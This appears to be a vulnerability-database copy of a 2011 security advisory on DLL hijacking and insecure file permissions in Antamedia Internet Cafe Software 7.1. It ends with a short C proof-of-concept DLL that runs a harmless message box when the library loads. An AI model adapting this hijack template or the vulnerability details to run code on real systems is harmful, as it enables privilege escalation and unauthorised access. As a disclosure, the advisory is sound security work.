Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2011-5005
HistoryApr 03, 2011 - 12:00 a.m.

Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading

2011-04-0300:00:00
Gjoko Krstic
zeroscience.mk
52

8.1 High

AI Score

Confidence

Low

JSON

Title: Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading
Advisory ID: ZSL-2011-5005
Type: Local/Remote
Impact: System Access, Privilege Escalation
Risk: (4/5)
Release Date: 03.04.2011

Summary

Internet Cafe Software – Cyber Cafe software is a worldwide top selling solution for CyberCafe management and game center control. It protects your computers from unauthorized usage and helps with customer billing. Many features like POS, print manager, console controller, smart cards, credit card billing, makes it suitable for any cyber cafe, hotel, airport terminals, game center.

Description

Antamedia ICS suffers from a dll hijacking vulnerability and improper ACL permissions that enables the attacker to execute arbitrary code or change the binary with another of his/her choice because of the ©Change perm for the group Everyone (AICLogin.exe, AICCore.exe). The vulnerable extensions are .fp3 and .swf thru qwave.dll library.

Vendor

Antamedia - <http://www.antamediacafe.com>

Affected Version

7.1.1.0

Tested On

Microsoft Windows XP Professional SP3 (EN)

Vendor Status

N/A

PoC

antamedia.c

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://securityreason.com/exploitalert/10271&gt;
[2] <http://packetstormsecurity.org/files/100029&gt;

Changelog

[03.04.2011] - Initial release
[04.04.2011] - Added reference [1] and [2]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>/*

 Antamedia Internet Cafe Software 7.1 Insecure Permissions/DLL Loading

 Vendor: Antamedia
 Product Web Page: http://www.antamediacafe.com
 Affected Version: 7.1.1.0

 Summary: Internet Cafe Software � Cyber Cafe software is a worldwide top
 selling solution for CyberCafe management and game center control. It
 protects your computers from unauthorized usage and helps with customer
 billing. Many features like POS, print manager, console controller, smart
 cards, credit card billing, makes it suitable for any cyber cafe, hotel,
 airport terminals, game center.

 Desc: Antamedia ICS suffers from a dll hijacking vulnerability and improper
 ACL permissions that enables the attacker to execute arbitrary code or change
 the binary with another of his/her choice because of the (C)Change perm for the
 group Everyone (AICLogin.exe, AICCore.exe). The vulnerable extensions are .fp3
 and .swf thru qwave.dll library.


 Tested on Microsoft Windows XP Professional SP3 (EN)


 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 Advisory ID: ZSL-2011-5005
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5005.php


 26.03.2011

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}</windows.h></p></body></html>

8.1 High

AI Score

Confidence

Low

JSON